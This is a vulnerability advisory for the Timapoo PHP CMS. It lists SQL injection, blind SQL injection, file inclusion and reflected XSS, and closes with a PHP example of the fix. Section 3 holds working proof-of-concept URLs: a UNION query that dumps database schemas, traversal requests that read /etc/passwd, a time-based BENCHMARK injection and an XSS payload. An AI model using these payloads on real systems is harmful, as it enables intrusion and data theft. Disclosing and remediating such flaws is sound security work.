Timapoo <= 1.0.0 Multiple Vulnerabilities


######################################### www.BugReport.ir ########################################
#
# Amnpardaz Security Research Team
#
# Title: Timapoo Multiple Vulnerabilities
# Vulnerable Version: 1.0.0 (prior versions may also be affected)
# Vendor: http://www.timapoo.ir/
# Exploitation: Remote
# Exploit: Available
# Impact: High
# Fix: N/A
###################################################################################################

####################
1. Description:
####################

Timapoo is a content management system written in PHP with a MySQL back end. It is used to manage a website, the languages of the website, and some other features.

This CMS is not open source; it is used privately by the vendor to build its customers' websites.

####################
2. Vulnerabilities:
####################

2.1. Injection flaws: SQL injection in the "album", "la", "aq", "site" and "sys" parameters.

2.1.1. Exploit: see the Exploits/PoCs section.

2.2. File inclusion flaw.

2.2.1. Exploit: see the Exploits/PoCs section.

2.3. Injection flaws: blind SQL injection in the "username" (POST) parameter of the "pouyanweb" page and in the "sys" parameter of the "dynamic" page.

2.3.1. Exploit: see the Exploits/PoCs section.

2.4. Cross-site scripting (XSS): reflected XSS in
"pouyanweb.php", "ref" parameter (GET),
"pouyanweb.php", "username" parameter (POST),
"dynamic.php", "album" parameter (GET),
"dynamic.php", "aq" parameter (GET),
"dynamic.php", "CatId" parameter (GET),
"dynamic.php", "date" parameter (GET),
"dynamic.php", "ref" parameter (GET),
"dynamic.php", "email" parameter (POST),
"dynamic.php", "family" parameter (POST),
"dynamic.php", "job" parameter (POST),
"dynamic.php", "name" parameter (POST),
"dynamic.php", "tel" parameter (POST),
"dynamic.php", "address" parameter (POST),
"dynamic.php", "zip" parameter (POST),
"dynamic.php", "la" parameter (GET),
"dynamic.php", "pg" parameter (GET),
"dynamic.php", "site" parameter (GET).

####################
3. Exploits/PoCs:
####################

3.1. POC:

http:///dynamic.php?action=show&album=-9380%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%28SELECT%20CONCAT%280x7174757571%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x7164756371%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201%2C1%29%2CNULL%2CNULL%2CNULL%2CNULL%23&la=fa&page=&pic=DSC07040.jpg&site=main&sys=gallery

3.2. POC:

http:///Components/PollAdd.php?la=../../../../../../../../../../etc/passwd%00.jpg

http:///coms.php?dll=../../../../../../../../../../etc/passwd%00.jpg&la=

http:///pouyanweb.php?dll=../../../../../../../../../../etc/passwd%00.jpg&ip=

3.3. POC:

http:///dynamic.php?la=fa&page=&site=main&sys=1' AND 1=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),10,1))>40),BENCHMARK(5000000,MD5(0x62534242)),8893) AND 'a'='a

3.4. POC:

http:///dynamic.php?action=search&aq=1%22%20onmouseover%3dprompt%28%27ALARM!%27%29%20bad%3d%22&la=fa&site=main&sys=gallery

####################
4. Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.

Ref.: https://www.owasp.org/index.php/Data_Validation
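As an added example of the fix recommended above (this is not Timapoo's code, which is not public): the parameters named in section 2, handled with bound SQL parameters, an allowlist for anything that selects a module or a file, and encoding on output. Table, column, file and module names are assumptions.

```php
<?php
// Added example: safe handling of the inputs named in sections 2.1 to 2.4.
// Timapoo's real source is not available; names below are assumed.

// 2.1 / 2.3: "album" and "username" reach SQL. Bind values instead of
// concatenating them into the query string.
function fetchAlbum(PDO $db, string $album): ?array {
    $stmt = $db->prepare('SELECT id, title, pic FROM albums WHERE name = :album');
    $stmt->execute([':album' => $album]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2.3: "sys" selects a module. Restrict it to a fixed list (assumed list).
const ALLOWED_SYS = ['gallery', 'news', 'contact'];
function moduleName(string $sys): string {
    return in_array($sys, ALLOWED_SYS, true) ? $sys : 'gallery';
}

// 2.2: "la" / "dll" end up as file names (the PoC sends ../ and %00).
// Never build an include path from the request; map a short key to a fixed file.
const LANG_FILES = ['fa' => 'lang/fa.php', 'en' => 'lang/en.php'];   // assumed
function languageFile(string $la): string {
    return LANG_FILES[$la] ?? LANG_FILES['fa'];
}

// 2.4: "aq", "ref", "name", ... are echoed back into HTML. Encode on output.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// How dynamic.php could use the helpers (assumed page structure).
$db = new PDO('mysql:host=localhost;dbname=timapoo;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_EMULATE_PREPARES => false,          // real server-side prepares
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);
$sys = moduleName($_GET['sys'] ?? 'gallery');
require __DIR__ . '/' . languageFile($_GET['la'] ?? 'fa');
$album = fetchAlbum($db, $_GET['album'] ?? '');
echo '<input name="aq" value="' . h($_GET['aq'] ?? '') . '">';
```

Disabling emulated prepares matters for the blind injection in 2.3: with emulation on, PDO interpolates the values client-side and the database never sees a parameterised statement.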

####################
5. Credit:
####################

Amnpardaz Security Research & Penetration Testing Team

Contact: admin[@]bugreport[dot]ir

www.Bugreport.ir

www.Amnpardaz.com

Source: http://www.bugreport.ir/index_81.htm
